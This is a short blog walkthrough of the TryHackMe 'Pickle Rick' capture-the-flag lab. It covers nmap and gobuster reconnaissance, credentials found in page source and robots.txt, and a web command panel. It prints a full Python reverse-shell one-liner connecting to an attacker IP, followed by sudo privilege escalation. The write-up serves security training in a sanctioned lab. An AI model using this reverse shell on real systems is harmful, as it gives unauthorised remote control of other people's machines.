TryHackMe | Pickle Rick Walkthrough

Prateek Parashar
3 min readJun 14, 2021

--

A Rick and Morty CTF. Help turn Rick back into a human!

This walkthrough is written as a part of Master's certificate in cybersecurity (Red Team) that I am pursuing from HackeU.

Reconnaissance

Performing a nmap scan we see that we have 2 ports open(22 and 80). So that's means we have a webpage also

nmap -sS -sV <IP>

We have a webpage

Checking source code and robots.txt

We get the username in the source code of the page.

In robots.txt we have a string that might come in handy later.

Running gobutser and found out the login page.

gobuster dir -u <IP> -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,htm

We get a login page and we use the username and password we found earlier from the source code and the robots.txt

We get an option to input commands and on doing an ls the command we see all the files.

Instead of giving commands here, i choose to get a python reverse shell.

Checking if python exists

And yes it has python3

Now executing our payload

python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“<Attacker_IP>”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

AND Volia!!! we get a reverse shell

Finding Flags

Found the first flag easily

The second flag is in the user rick directory

Escalating Privileges

Checking the permissions and we find out that we can run all the commands on the system as sudo

And easily we become root

In the root directory, we find the root flag as 3rd.txt

and we successfully finished the room.

Do leave some claps if this Walkthrough helped you.

--

--

Prateek Parashar
Prateek Parashar

Written by Prateek Parashar

Computer Science graduate who is passionate about CyberSecurity. An IoT and Crypto enthusiast.

No responses yet